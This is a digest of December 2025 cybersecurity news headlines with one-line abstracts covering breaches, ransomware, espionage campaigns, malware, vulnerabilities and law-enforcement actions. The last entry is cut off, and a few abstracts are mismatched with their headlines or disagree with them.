December, 2025
December 30, 2025 – Phishing
Fake Grubhub emails promise tenfold return on sent cryptocurrency Full Text
Abstract
Grubhub users received fraudulent messages, apparently from a company email address, promising a tenfold bitcoin payout in return for a transfer to a specified cryptocurrency wallet.Bleeping Computer
December 30, 2025 – APT
Evasive Panda cyberespionage campaign uses DNS poisoning to install MgBot backdoor Full Text
Abstract
Researchers spotted the China-linked APT group Evasive Panda (aka Daggerfly, Bronze Highland, and StormBamboo) running a targeted cyber-espionage campaign using DNS poisoning to deliver the MgBot backdoor against victims in Türkiye, China, and India.Security Affairs
December 30, 2025 – Breach
Korean Air discloses data breach after the hack of its catering and duty-free supplier Full Text
Abstract
Korean Air suffered a data breach after its in-flight catering supplier Korean Air Catering & Duty-Free (KC&D) was hacked, exposing personal data of ~30,000 employees of Korean Air employees.Security Affairs
December 30, 2025 – Criminals
Hacker arrested for KMSAuto malware campaign with 2.8 million downloads Full Text
Abstract
A Lithuanian national has been arrested for his alleged involvement in infecting 2.8 million systems with clipboard-stealing malware disguised as the KMSAuto tool for illegally activating Windows and Office software.Bleeping Computer
December 30, 2025 – Breach
Two more banks notifying thousands of victims about Marquis Software ransomware attack Full Text
Abstract
Two U.S. banks have come forward to warn customers they were impacted by an August ransomware attack. Artisans' Bank and VeraBank informed regulators in Maine last week that recent data breaches were sourced back to a cyberattack on Marquis Software.The Record
December 30, 2025 – Hacker
Chinese state hackers use rootkit to hide ToneShell malware activity Full Text
Abstract
A new sample of the ToneShell backdoor, typically seen in Chinese cyberespionage campaigns, has been delivered through a kernel-mode loader in attacks against government organizations.Bleeping Computer
December 26, 2025 – Government
FCC Bans Foreign-Made Drones and Key Parts Over U.S. National Security Risks Full Text
Abstract
The FCC has announced a ban on foreign-made drones and critical components, citing national security risks. This decision is grounded in the 2025 National Defense Authorization Act (NDAA) and aims to protect U.S. airspace.The Hacker News
December 26, 2025 – Government
Japan Adopts New Cybersecurity Strategy to Counter Rising Cyber Threats Full Text
Abstract
The new strategy identifies cyber operations linked to China, Russia, and North Korea as significant threats. These attacks have targeted public institutions, private companies, and essential services, leveraging advanced technologies like AI.The Cyber Express
December 26, 2025 – Phishing
Nomani Investment Scam Surges 62% Using AI Deepfake Ads on Social Media Full Text
Abstract
The Nomani investment scam has surged by 62%, utilizing AI deepfake ads on social media platforms to deceive users. This alert provides an overview of the scam's tactics, improvements in AI-generated content, and the broader implications of ad fraud.The Hacker News
December 26, 2025 – Government
CISA Releases One Industrial Control Systems Advisory Full Text
Abstract
The vulnerabilities in Mitsubishi Electric Air Conditioning Systems could potentially allow unauthorized access or control over the systems, leading to disruptions in operations and potential safety hazards.CISA
December 25, 2025 – General
NIST, MITRE announce $20 million research effort on AI cybersecurity Full Text
Abstract
The NIST and The MITRE Corporation have announced a $20 million initiative to establish two new research centers focused on artificial intelligence (AI) and its impact on cybersecurity for U.S. critical infrastructure.Cyber Scoop
December 25, 2025 – Malware
Webrat, disguised as exploits, is spreading via GitHub repositories Full Text
Abstract
The Webrat malware campaign is actively targeting inexperienced security professionals and students by disguising itself as exploits for high-profile vulnerabilities. The campaign exploits vulnerabilities with high CVSSv3 scores.Secure List
December 25, 2025 – Criminals
Chinese Crypto Scammers on Telegram Are Fueling the Biggest Darknet Markets Ever Full Text
Abstract
The Chinese-speaking crypto scam markets on Telegram, specifically Tudou Guarantee and Xinbi Guarantee, have become the largest darknet markets in history. These markets facilitate nearly $2 billion in monthly transactions.Wired
December 25, 2025 – Vulnerabilities
React2Shell Explained (CVE-2025-55182): From Vulnerability Discovery to Exploitation Full Text
Abstract
React2Shell is a critical RCE vulnerability affecting React Server Components and the React Flight protocol. This vulnerability allows unauthenticated attackers to execute arbitrary code on vulnerable servers through a single crafted HTTP request.ReSecurity
December 25, 2025 – Privacy
Inside Uzbekistan’s nationwide license plate surveillance system Full Text
Abstract
Uzbekistan's nationwide license plate surveillance system has been exposed to the internet without a password. This lapse reveals the real-time locations of surveillance cameras and millions of photos and videos of vehicles.Tech Crunch
December 25, 2025 – Vulnerabilities
MongoDB warns admins to patch severe RCE flaw immediately Full Text
Abstract
MongoDB has issued an urgent advisory for IT administrators to patch a critical remote code execution (RCE) vulnerability, CVE-2025-14847. This flaw affects multiple versions of MongoDB and MongoDB Server.Bleeping Computer
December 24, 2025 – Government
U.S. CISA adds a flaw in Digiever DS-2105 Pro to its Known Exploited Vulnerabilities catalog Full Text
Abstract
The CISA has added a critical vulnerability in the Digiever DS-2105 Pro network video recorder to its Known Exploited Vulnerabilities catalog. This vulnerability, identified as CVE-2023-52163, has a CVSS score of 8.8.Security Affairs
December 24, 2025 – Breach
South Korea’s Shinhan Card Data Breach Affects 192,000 Merchants Full Text
Abstract
The Shinhan Card data breach has exposed the personal information of approximately 192,000 card merchants. This incident highlights the risks associated with internal misconduct within financial institutions.The Cyber Express
December 24, 2025 – Criminals
U.S. DoJ Seizes Fraud Domain Behind $14.6 Million Bank Account Takeover Scheme Full Text
Abstract
The U.S. Department of Justice has seized the domain web3adspanels[.]org, used in a bank account takeover scheme resulting in $14.6 million in losses. Visitors to the domain now see a seizure banner indicating its takedown.The Hacker News
December 23, 2025 – Criminals
FBI Seizes Fake ID Template Domains Operating from Bangladesh Full Text
Abstract
The FBI has successfully dismantled an online marketplace operated by Zahid Hasan from Bangladesh, which sold fake ID templates. This operation, known as TechTreek, involved the sale of digital templates for fraudulent identification documents.Hack News
December 23, 2025 – Vulnerabilities
New Flaw in Somalia’s E-Visa System Exposes Travelers’ Passport Data Full Text
Abstract
A critical security flaw in Somalia's e-visa system has been identified, exposing sensitive personal data of travelers. This vulnerability allows unauthorized access to passport details, full names, and birth dates.The Cyber Express
December 23, 2025 – Breach
1,000 systems pwned in Romanian Waters ransomware attack Full Text
Abstract
A ransomware attack has compromised approximately 1,000 systems within Romania's water management administration Romanian Waters. The attack began on December 20 and spread to ten of the country's 11 river basin management organizations.The Register
December 23, 2025 – Breach
University of Phoenix data breach impacts nearly 3.5 million individuals Full Text
Abstract
The University of Phoenix (UoPX) experienced a data breach affecting 3,489,274 individuals, including students, staff, and suppliers. The breach was disclosed on the university's official website in early December.Bleeping Computer
December 23, 2025 – Hacker
Hackers Abuse Popular Monitoring Tool Nezha as a Stealth Trojan Full Text
Abstract
Hackers have been using Nezha with scripts containing Simplified Chinese messages, and their command center is hosted on Alibaba Cloud services in Japan. This activity is part of a broader trend of digital warfare.Hack Read
December 23, 2025 – Malware
Malicious npm package steals WhatsApp accounts and messages Full Text
Abstract
A malicious npm package named lotusbail has been identified, posing as a legitimate WhatsApp Web API library. This package is a fork of the WhiskeySockets Baileys project and has been downloaded over 56,000 times.Bleeping Computer
December 23, 2025 – Breach
Florida dermatologist warns 55,000+ people of data breach that compromised SSNs, medical info Full Text
Abstract
Brevard Skin and Cancer Center has notified over 55,000 individuals of a data breach that compromised sensitive personal information, including names, SSNs, billing and claims information, diagnoses, clinical information, and more.CompariTech
December 22, 2025 – Malware
TikTok’s “Scam-Yourself” Trap: How AuraStealer Malware Tricks Users into Hacking Their Own PCs Full Text
Abstract
A deep-dive analysis by Gen Digital (Gen Threat Labs) has unveiled AuraStealer, an emerging Malware-as-a-Service (MaaS) that is rapidly gaining traction in underground forums by leveraging a devious distribution tactic known as “Scam-Yourself.”Security Online
December 22, 2025 – Ransomware
“ClickFix” Trap: Fake Human Verification Leads to Qilin Ransomware Infection Full Text
Abstract
A deceptive social engineering tactic known as “ClickFix” has evolved into a gateway for major ransomware attacks, with researchers uncovering a direct link between these fake verification prompts and the notorious Qilin ransomware group.Security Online
December 22, 2025 – General
Senior U.S. Officials Continue to be Impersonated in Malicious Messaging Campaign Full Text
Abstract
Activity dating back to 2023 reveals malicious actors have impersonated senior U.S. state government, White House, and Cabinet level officials, as well as members of Congress to target individuals.IC3
December 22, 2025 – Government
CISA and Partners Release Update to Malware Analysis Report BRICKSTORM Backdoor Full Text
Abstract
CISA, National Security Agency, and Canadian Centre for Cyber Security have released an update to the Malware Analysis Report BRICKSTORM Backdoor with indicators of compromise (IOCs) and detection signatures for additional BRICKSTORM samples.CISA
December 22, 2025 – Law Article
Nefilim Ransomware Affiliate Pleads Guilty Full Text
Abstract
Artem Aleksandrovych Stryzhak, 35, was extradited from the Spanish city of Barcelona earlier this year after being arrested in June 2024. He pleaded guilty to one count of conspiracy to commit computer fraud, according to the US Justice Department.Infosecurity Magazine
December 19, 2025 – Attack
GachiLoader: Defeating Node.js Malware with API Tracing GachiLoader: Defeating Node.js Malware Full Text
Abstract
A sophisticated malware distribution campaign has been identified, leveraging the YouTube Ghost Network to deploy GachiLoader, a heavily obfuscated Node.js-based loader. This loader delivers Rhadamanthys infostealer to unsuspecting victims.Check Point
December 19, 2025 – Attack
Clop ransomware targets Gladinet CentreStack in data theft attacks Full Text
Abstract
The Clop ransomware gang is actively targeting Gladinet CentreStack file servers in a new data theft extortion campaign. This campaign involves scanning for and breaching Internet-exposed CentreStack servers.Bleeping Computer
December 19, 2025 – Vulnerabilities
Windows 10 OOB update released to fix Message Queuing (MSMQ) issues Full Text
Abstract
Microsoft has released an out-of-band (OOB) update (KB5074976) to address issues with the Message Queuing (MSMQ) functionality in Windows 10, which arose after the December 9, 2025, update.Bleeping Computer
December 19, 2025 – Phishing
Inside a purchase order PDF phishing campaign Full Text
Abstract
A sophisticated phishing campaign has been identified, utilizing weaponized PDF documents to steal corporate credentials. The phishing emails contain a PDF attachment named "NEW Purchase Order # 52177236.pdf.Malware Byte
December 19, 2025 – Criminals
DIG AI: Uncensored Darknet AI Assistant at the Service of Criminals and Terrorists Full Text
Abstract
The emergence of DIG AI, an uncensored darknet AI assistant, has been identified as a significant threat, with a notable increase of over 200% in mentions and use of malicious AI tools from 2024 to 2025.ReSecurity
December 19, 2025 – APT
Group Policy abuse reveals China-aligned espionage group targeting governments Full Text
Abstract
A China-aligned advanced persistent threat group, LongNosedGoblin, has been identified targeting government institutions in Southeast Asia and Japan. The group exploits Windows Group Policy to deploy malware and conduct long-term surveillance.Help Net Security
December 19, 2025 – Criminals
Amazon blocked 1,800 suspected DPRK job applicants Full Text
Abstract
Amazon has successfully blocked over 1,800 suspected North Korean scammers from securing remote jobs since April 2024. These scammers use fake identities, AI tools, and deepfakes to apply for jobs, funneling their wages to the North Korean regime.The Register
December 18, 2025 – General
November 2025 Trends Report on Phishing Emails Full Text
Abstract
This advisory provides an overview of phishing email trends observed in November 2025, highlighting the tactics, techniques, and procedures (TTPs) employed by threat actors.Ahn Lab.
December 18, 2025 – Botnet
Kimwolf Botnet Hijacks 1.8 Million Android TVs, Launches Large-Scale DDoS Attacks Full Text
Abstract
The Kimwolf botnet has emerged as a significant threat, hijacking 1.8 million Android-based devices, including TVs, set-top boxes, and tablets, to conduct large-scale DDoS attacks. This botnet is linked to the AISURU botnet.The Hacker News
December 18, 2025 – Hacker
Ink Dragon’s Relay Network and Stealthy Offensive Operation Full Text
Abstract
Ink Dragon, a sophisticated Chinese threat actor, has been leveraging a custom ShadowPad IIS Listener module to transform compromised servers into distributed relay nodes.Check Point
December 18, 2025 – Malware
New spyware discovered on Belarusian journalist’s phone after interrogation Full Text
Abstract
A new spyware, dubbed ResidentBat, has been discovered on a Belarusian journalist's phone. This spyware targets Android devices and can access call logs, SMS, encrypted app messages, microphone recordings, locally stored files, and screen captures.The Record
December 18, 2025 – Breach
Richmond, VA mental health service notifies 113,000+ people of data breach Full Text
Abstract
The Richmond Behavioral Health Authority in Virginia experienced a data breach, affecting 113,232 individuals. The compromised data includes names, SSNs, passport numbers, financial account information, and protected health information.CompariTech
December 18, 2025 – Vulnerabilities
Exploited SonicWall zero-day patched (CVE-2025-40602) Full Text
Abstract
A critical vulnerability has been patched in SonicWall's Secure Mobile Access (SMA) 1000 appliances. This vulnerability, when combined with CVE-2025-23006, allows attackers to achieve unauthenticated remote code execution with root privileges.Help Net Security
December 18, 2025 – Government
CISA Adds Three Known Exploited Vulnerabilities to Catalog Full Text
Abstract
CISA has added three new vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog, indicating active exploitation. These vulnerabilities pose significant risks to federal enterprises and require immediate attention.CISA
December 18, 2025 – Government
CISA Flags Critical ASUS Live Update Flaw After Evidence of Active Exploitation Full Text
Abstract
A critical vulnerability in ASUS Live Update, identified as CVE-2025-59374 with a CVSS score of 9.3, has been actively exploited. This flaw, resulting from a supply chain compromise, allows attackers to perform unintended actions on affected devices.The Hacker News
December 17, 2025 – Vulnerabilities
Multiple Vulnerabilities in Apple Products Could Allow for Arbitrary Code Execution Full Text
Abstract
Multiple bugs have been identified in Apple products, with the most severe potentially allowing for arbitrary code execution. Apple is aware of reports that CVE-2025-43529 and CVE-2025-14174 may have been exploited in sophisticated attacks.Ci Security
December 17, 2025 – Cryptocurrency
Compromised IAM Credentials Power a Large AWS Crypto Mining Campaign Full Text
Abstract
A sophisticated cryptocurrency mining campaign has been identified targeting AWS customers. The attackers leverage compromised IAM credentials to deploy crypto miners, using advanced persistence techniques to evade detection and maintain operations.The Hacker News
December 17, 2025 – Vulnerabilities
Photo booth flaw exposes people’s private pictures online Full Text
Abstract
A vulnerability in a photo booth company's website exposed private photos of users, posing significant privacy risks. The flaw allowed unauthorized access to photos and videosMalware Bytes
December 17, 2025 – Breach
Russia-linked hackers breach critical infrastructure organizations via edge devices Full Text
Abstract
The threat actor has shifted its focus from exploiting zero-day and N-day vulnerabilities to targeting known but unpatched flaws in edge devices. This strategy reduces their workload and chances of detection while maintaining operational outcomes.Cybersecurity Dive
December 17, 2025 – Vulnerabilities
Vulnerability in Mitsubishi Electric GT Designer3 Allows Unauthorized Device Operation Full Text
Abstract
A vulnerability in Mitsubishi Electric GT Designer3 allows attackers to obtain plaintext credentials, potentially leading to unauthorized operation of GOT2000 and GOT1000 series devices.CISA
December 17, 2025 – Vulnerabilities
Critical Vulnerability in Hitachi Energy AFS, AFR, and AFF Series Full Text
Abstract
A critical vulnerability, CVE-2024-3596, has been identified in Hitachi Energy's AFS, AFR, and AFF series. This vulnerability can compromise data integrity and disrupt availability, posing significant risks to critical infrastructure sectors.CISA
December 17, 2025 – Government
CISA Alerts on Apple WebKit Zero-Day Actively Exploited Full Text
Abstract
CISA identified a critical zero-day vulnerability, CVE-2025-43529, in Apple's WebKit rendering engine. This vulnerability is actively exploited in the wild, affecting millions of users across iOS, iPadOS, macOS, and other Apple platforms.CISA
December 17, 2025 – Malware
Cellik Android malware builds malicious versions from Google Play apps Full Text
Abstract
Cellik is a newly discovered Android malware-as-a-service (MaaS) that allows cybercriminals to create malicious versions of apps from the Google Play Store. It is offered for $150 per month or $900 for lifetime access.Bleeping Computer
December 17, 2025 – Phishing
BlindEagle Deploys Caminho and DCRAT Full Text
Abstract
BlindEagle, a threat actor operating in South America, has launched a sophisticated spear phishing campaign targeting a Colombian government agency under the Ministry of Commerce, Industry and Tourism (MCIT).ZScaler
December 17, 2025 – Attack
GhostPoster attacks hide malicious JavaScript in Firefox addon logos Full Text
Abstract
The "GhostPoster" campaign is exploiting Firefox extensions by embedding malicious JavaScript in the image logos using steganography. This technique allows attackers to monitor browser activity and plant a backdoor, affecting over 50,000 users.Bleeping Computer
December 15, 2025 – Breach
Data breach at credit check giant 700Credit affects at least 5.6 million Full Text
Abstract
A sophisticated adversary-in-the-middle (AiTM) phishing campaign has been identified, targeting Microsoft 365 and Okta users. The campaign bypasses multi-factor authentication (MFA) by hijacking legitimate single sign-on (SSO) authentication flows.Tech Crunch
December 15, 2025 – Vulnerabilities
Known Exploited Vulnerabilities Catalog Full Text
Abstract
A critical out of bounds memory access vulnerability has been identified in Google Chromium, tracked as CVE-2025-14174. This vulnerability could allow remote attackers to perform unauthorized memory access via a crafted HTML page.CISA
December 15, 2025 – Breach
Fieldtex notifies 274,000 people of data breach, ransomware gang takes credit Full Text
Abstract
Fieldtex, a New York-based manufacturer, has notified 247,363 individuals of a data breach that occurred in August 2025. The breach, claimed by the ransomware group Akira, involved the theft of personal information.CompariTech
December 15, 2025 – Malware
New PyStoreRAT Malware Targets OSINT Researchers Through GitHub Full Text
Abstract
PyStoreRAT is a newly identified malware targeting OSINT researchers and IT professionals through GitHub. It is distributed via fake OSINT tools and other software, leveraging AI to build trust and evade detection.Hack Read
December 15, 2025 – Outage
More than 340,000 impacted by cyberattack on library in large Washington county Full Text
Abstract
A cyberattack on the Pierce County Library System in Washington has exposed the personal information of over 340,000 individuals. The breach, attributed to the INC ransomware gang, forced the library system to shut down all its systems.The Record
December 15, 2025 – Vulnerabilities
Apple fixes two zero-day flaws exploited in ‘sophisticated’ attacks Full Text
Abstract
Apple has released emergency updates to address two zero-day vulnerabilities, CVE-2025-43529 and CVE-2025-14174, which were exploited in sophisticated attacks targeting specific individuals.Bleeping Computer
December 15, 2025 – Government
CISA Adds Actively Exploited Sierra Wireless Router Flaw Enabling RCE Attacks Full Text
Abstract
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a high-severity vulnerability, CVE-2018-4063, affecting Sierra Wireless AirLink ALEOS routers, to its Known Exploited Vulnerabilities catalog.The Hacker News
December 15, 2025 – Breach
Experts found an unsecured 16TB database containing 4.3B professional records Full Text
Abstract
An unsecured 16TB MongoDB database containing 4.3 billion professional records was discovered, posing a significant risk for large-scale AI-driven social engineering attacks. The database included LinkedIn-style data.Security Affairs
December 12, 2025 – Vulnerabilities
Notepad++ fixes flaw that let attackers push malicious update files Full Text
Abstract
Notepad++ has addressed a critical bug in its WinGUp update tool that allowed attackers to push malicious update files. It was exploited to execute unauthorized commands and exfiltrate sensitive data, posing a significant security risk to users.Bleeping Computer
December 12, 2025 – Phishing
Doxers Posing as Cops Are Tricking Big Tech Firms Into Sharing People’s Private Data Full Text
Abstract
Hackers are exploiting vulnerabilities in the emergency data request (EDR) process by impersonating law enforcement officers to obtain private user data from major tech companies.Wired
December 11, 2025 – Malware
Cracking ValleyRAT: From Builder Secrets to Kernel Rootkits Full Text
Abstract
The ValleyRAT backdoor, also known as Winos/Winos4.0, has been dissected to reveal its modular architecture and advanced capabilities. The backdoor is associated with Chinese-speaking threat actors.Check Point
December 11, 2025 – Malware
VS Code extensions contain trojan-laden fake image Full Text
Abstract
A recent campaign has been identified involving 19 malicious VS Code extensions that contain malware disguised as a PNG file. These extensions exploit the "path-is-absolute" npm package to execute malicious activities on developers' machines.Reversing Labs
December 11, 2025 – Vulnerabilities
.NET SOAPwn Flaw Opens Door for File Writes and Remote Code Execution via Rogue WSDL Full Text
Abstract
A critical vulnerability, known as "SOAPwn," has been identified in the .NET Framework, allowing attackers to achieve remote code execution by exploiting WSDL imports and HTTP client proxies.The Hacker News
December 11, 2025 – Breach
700+ self-hosted Git instances battered in 0-day attacks Full Text
Abstract
A 0-day bug in Gogs, a self-hosted Git service, is being actively exploited. The vulnerability (CVE-2025-8110) affects Gogs servers with open-registration enabled. Over 700 instances have been compromised, with 1,400 exposed to the internet.The Register
December 11, 2025 – Breach
Ransomware gang says it hacked Kansas broadband provider Rainbow Communications Full Text
Abstract
Rainbow Communications, a broadband provider in Kansas, experienced a ransomware attack by the group Inc, leading to service disruptions from November 16 to November 19, 2025. Inc claims to have stolen 200 GB of data.CompariTech
December 11, 2025 – Malware
New DroidLock malware locks Android devices and demands a ransom Full Text
Abstract
DroidLock is a newly discovered Android malware that locks devices and demands a ransom. It specifically targets Spanish-speaking users and is distributed through malicious websites promoting fake applications.Bleeping Computer
December 11, 2025
ClickFix Social Engineering Sparks Rise of CastleLoader Attacks Full Text
Abstract
A new malware campaign has been identified, utilizing ClickFix social engineering tactics to deploy the CastleLoader malware family. This campaign employs a Python-based delivery chain, replacing earlier AutoIt droppers with a compact Python loader.Infosecuirty Magazine
December 11, 2025 – Breach
Petco takes down Vetco website after exposing customers’ personal information Full Text
Abstract
Petco's Vetco Clinics website experienced a significant data breach, exposing sensitive customer and pet information. This breach marks the third data breach for Petco in 2025.Tech Crunch
December 11, 2025 – Malware
WordPress Auto-Login Backdoor Disguised as JavaScript Data File Full Text
Abstract
A WordPress backdoor has been discovered, disguised as a JavaScript data file, allowing attackers to automatically log into administrator accounts without credentials. This malware is hidden in a PHP file within the WordPress `wp-admin/js` directory.Sucuri
December 11, 2025 – Education
Browser Hijacking: Three Technique Studies Full Text
Abstract
This advisory explores three distinct techniques of browser hijacking, focusing on the manipulation of browser preference files, the use of a Browser Remote Access Tool (BRAT), and the exploitation of registry entries and scheduled tasks.GData Software
December 9, 2025 – Government
FBI: Crooks manipulate online photos to fuel virtual kidnapping ransoms Full Text
Abstract
The FBI issued a warning about a new scam where criminals manipulate online photos to create fake "proof-of-life" images for virtual kidnapping scams. These involve criminals posing as kidnappers, demanding ransom, and using altered images.Security Affairs
December 9, 2025 – Criminals
European cops arrest 193 ‘violence-as-a-service’ suspects Full Text
Abstract
The Europol's Operational Taskforce GRIMM has successfully dismantled a significant "violence-as-a-service" network, resulting in the arrest of 193 individuals. The operation involved law enforcement agencies from multiple European countries.The Register
December 9, 2025 – General
Researchers spot 700 percent increase in hypervisor attacks Full Text
Abstract
The cybersecurity landscape has witnessed a dramatic 700% increase in ransomware attacks targeting hypervisors, with their role in malicious encryption surging from 3% in the first half of the year to 25% in the second half.The Register
December 9, 2025 – General
Initial access brokers involved in more attacks, including on critical infrastructure Full Text
Abstract
Initial Access Brokers have become pivotal in the cybercrime ecosystem, facilitating the outsourcing of intrusion tasks to advanced adversaries. This commoditization of access to critical systems allows IABs to sell access to the highest bidder.Cybersecurity Dive
December 9, 2025 – Phishing
Scammers harvesting Facebook photos to stage fake kidnappings, warns FBI Full Text
Abstract
The FBI has issued a warning about a new scam where criminals harvest photos from social media platforms like Facebook, LinkedIn, and X to stage fake kidnappings. These photos are used as "proof-of-life" to extort ransom from the victim's family.Malware Bytes
December 9, 2025 – General
UK intelligence warns AI ‘prompt injection’ attacks might never go away Full Text
Abstract
The UK's National Cyber Security Centre (NCSC) has issued a warning about the persistent threat of "prompt injection" attacks on AI systems. These attacks manipulate AI models into executing unintended commands, posing a significant security risk.The Record
December 9, 2025 – Vulnerabilities
Three hacking groups, two vulnerabilities and all eyes on China Full Text
Abstract
The ToolShell campaign has exposed critical vulnerabilities in Microsoft's SharePoint software, exploited by three Chinese hacking groups: Linen Typhoon, Violet Typhoon, and Storm-2603.The Record
December 9, 2025 – Breach
Experts Confirm JS#SMUGGLER Uses Compromised Sites to Deploy NetSupport RAT Full Text
Abstract
The JS#SMUGGLER campaign leverages compromised websites to deploy the NetSupport RAT, that allows attackers full control over victim systems. The campaign targets enterprise users through a sophisticated multi-stage web-based malware operation.The Hacker News
December 9, 2025 – Malware
ChrimeraWire Trojan Fakes Chrome Activity to Manipulate Search Rankings Full Text
Abstract
ChrimeraWire trojan manipulates search engine rankings by simulating user activity through Chrome. Unlike traditional malware, it focuses on boosting the visibility of specific websites in search results rather than stealing data or encrypting files.Hack Read
December 9, 2025 – Malware
Malicious VSCode extensions on Microsoft’s registry drop infostealers Full Text
Abstract
Two malicious VSCode extensions, Bitcoin Black and Codo AI, have been identified on Microsoft's registry. These extensions, published under the developer name 'BigBlack', are designed to infect developers' machines with information-stealing malware.Bleeping Computer
December 5, 2025 – Malware
Researchers find Predator spyware is being used in several countries, including Iraq Full Text
Abstract
Predator spyware, developed by Intellexa, is actively being used in several countries, including Iraq and Pakistan. Researchers have found indicators likely associated with the use of Predator spyware by an entity tied to Pakistan.The Record
December 5, 2025 – Vulnerabilities
Update Chrome now: Google fixes 13 security issues affecting billions Full Text
Abstract
Google has released an update for its Chrome browser, addressing 13 security vulnerabilities, including four high-severity issues. One critical vulnerability, CVE-2025-13633, affects the Digital Credentials feature.Malware Bytes
December 5, 2025 – Attack
GoldFactory Hits Southeast Asia with Modified Banking Apps Driving 11,000+ Infections Full Text
Abstract
GoldFactory, a financially motivated cybercriminal group, has launched a new wave of attacks in Southeast Asia, targeting mobile users in Indonesia, Thailand, and Vietnam. The group uses modified banking apps to distribute Android malware.The Hacker News
December 5, 2025 – Vulnerabilities
Threat Signal Report Full Text
Abstract
A critical pre-authentication RCE bug has been identified in Oracle Identity Manager’s REST WebServices. This vulnerability allows unauthenticated attackers to exploit URI and matrix parameter parsing weaknesses to execute arbitrary code.Fortinet
December 4, 2025 – Criminals
Massive gambling network doubles as hidden C2 and anonymity infrastructure, researchers say Full Text
Abstract
A massive network, active for over 14 years, is being used for illegal online gambling and malware distribution, doubling as a command and control (C2) and anonymity infrastructure.Help Net Security
December 4, 2025 – Government
CISA Adds Two Known Exploited Vulnerabilities to Catalog Full Text
Abstract
CISA has added two new bugs to its KEV Catalog. The vulnerabilities include: 1. CVE-2025-48572: Android Framework Privilege Escalation Vulnerability 2. CVE-2025-48633: Android Framework Information Disclosure VulnerabilityCISA
December 4, 2025 – Botnet
Aisuru botnet behind new record-breaking 29.7 Tbps DDoS attack Full Text
Abstract
The Aisuru botnet has launched over 1,300 DDoS attacks in just three months, with Cloudflare mitigating 2,867 attacks since the beginning of the year. The botnet's most significant attack peaked at 29.7 Tbps, setting a new record.Bleeping Computer
December 4, 2025 – Attack
How attackers use real IT tools to take over your computer Full Text
Abstract
A new wave of cyberattacks is exploiting legitimate Remote Monitoring and Management (RMM) tools such as LogMeIn Resolve and PDQ Connect. Attackers trick users into installing these tools under false pretenses.Malware Bytes
December 4, 2025 – Malware
Sha1-Hulud: The Second Coming of The New npm GitHub Worm Full Text
Abstract
Sha1-Hulud has resurfaced with a new campaign targeting npm packages, affecting thousands of code repositories. This malware compromises development environments by trojaning npm packages.Trust Wave
December 4, 2025 – Vulnerabilities
Microsoft “mitigates” Windows LNK flaw exploited as zero-day Full Text
Abstract
A high-severity Windows LNK vulnerability, tracked as CVE-2025-9491, has been exploited by multiple state-backed and cybercrime groups in zero-day attacks. This flaw allows attackers to hide malicious commands within Windows LNK files.Bleeping Computer
December 3, 2025 – Attack
Unraveling Water Saci’s New Multi-Format, AI-Enhanced Attacks Propagated via WhatsApp Full Text
Abstract
The Water Saci campaign in Brazil leverages AI-enhanced, multi-format attacks via WhatsApp, utilizing a layered infection chain with various file formats and scripting languages.Trend Micro
December 3, 2025 – Breach
Ransomware gang demands sheriff of Cleveland County, OK pay almost $800,000 in one week Full Text
Abstract
The Cleveland County Sheriff's Office in Oklahoma has been targeted by the Rhysida ransomware group, which is demanding a ransom of 9 bitcoin (approximately $787,000). The attack was disclosed on November 20, 2025.CompariTech
December 3, 2025 – Breach
Shai-Hulud 2.0 NPM malware attack exposed up to 400,000 dev secrets Full Text
Abstract
The Shai-Hulud 2.0 malware attack has compromised over 800 NPM packages, exposing up to 400,000 developer secrets. This attack has significant implications for software supply chain security.Bleeping Computer
December 3, 2025 – Vulnerabilities
Vulnerability & Patch Roundup — November 2025 Full Text
Abstract
This advisory provides a detailed overview of critical and high-risk vulnerabilities identified in various WordPress plugins and themes for November 2025. These vulnerabilities pose significant security risks.Sucuri
December 3, 2025
DOJ takes down Myanmar scam center website spoofing TickMill trading platform Full Text
Abstract
The DOJ has successfully dismantled a fraudulent website spoofing the TickMill trading platform, operated by a scam center in Myanmar. The Scam Center Strike Force tracked the fake website back to the Tai Chang scam compound in Kyaukhat, Myanmar.The Record
December 2, 2025 – Malware
ShadyPanda browser extensions amass 4.3M installs in malicious campaign Full Text
Abstract
The "ShadyPanda" campaign is a long-running malware operation involving browser extensions that have amassed over 4.3 million installations. Initially submitted in 2018, the first signs of malicious activity were observed in 2023.Bleeping Computer
December 2, 2025a – Breach
SmartTube YouTube app for Android TV breached to push malicious update Full Text
Abstract
The SmartTube YouTube app for Android TV has been compromised, leading to a malicious update being pushed to users. The breach involved the compromise of the developer's signing keys, affecting version 30.51 of the app.Bleeping Computer
December 2, 2025 – Malware
Glassworm malware returns in third wave of malicious VS Code packages Full Text
Abstract
The Glassworm malware has resurfaced in its third wave, targeting developers using VS Code-compatible editors. This campaign introduces 24 new malicious packages on the OpenVSX and Microsoft Visual Studio marketplaces.Bleeping Computer
December 2, 2025 – Criminals
Officials accuse North Korea’s Lazarus of $30 million theft from crypto exchange Full Text
Abstract
A recent cyberattack on South Korea's largest cryptocurrency exchange, Upbit, resulted in the theft of $30 million. The attack is attributed to North Korea's Lazarus Group.The Record
December 2, 2025 – Vulnerabilities
Google addresses 107 Android vulnerabilities, including two zero-days Full Text
Abstract
Google's December security update for Android addresses 107 vulnerabilities, including two high-severity zero-day vulnerabilities, CVE-2025-48633 and CVE-2025-48572. This update marks the second-highest number of vulnerabilities patched this year.Cyber Scoop
December 2, 2025 – Vulnerabilities
Full Disclosure: [REVIVE-SA-2025-005] Revive Adserver Vulnerability Full Text
Abstract
A vulnerability in Revive Adserver, identified as CVE-2025-55129, has been reported. This vulnerability involves an incomplete list of disallowed inputs, allowing for potential impersonation attacks.SecLists
December 1, 2025 – Criminals
Police takes down Cryptomixer cryptocurrency mixing service Full Text
Abstract
Law enforcement agencies in Switzerland and Germany have successfully dismantled the Cryptomixer cryptocurrency mixing service. This operation, known as "Operation Olympia," resulted in the seizure of €24 million in Bitcoin.Bleeping Computer
December 1, 2025 – Breach
South Korea’s Coupang Hit by Massive Data Breach Affecting Nearly 34 Million Customers Full Text
Abstract
Coupang, a leading South Korean e-commerce platform, has experienced a massive data breach affecting nearly 34 million customers. This incident is one of the largest cybersecurity breaches in South Korea in recent years.The Cyber Express
December 1, 2025 – Government
CISA Adds Actively Exploited XSS Bug CVE-2021-26829 in OpenPLC ScadaBR to KEV Full Text
Abstract
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a cross-site scripting (XSS) vulnerability, CVE-2021-26829, in OpenPLC ScadaBR to its Known Exploited Vulnerabilities (KEV) catalog.The Hacker News
December 1, 2025 – Breach
Brsk confirms breach as bidding begins for 230K+ records Full Text
Abstract
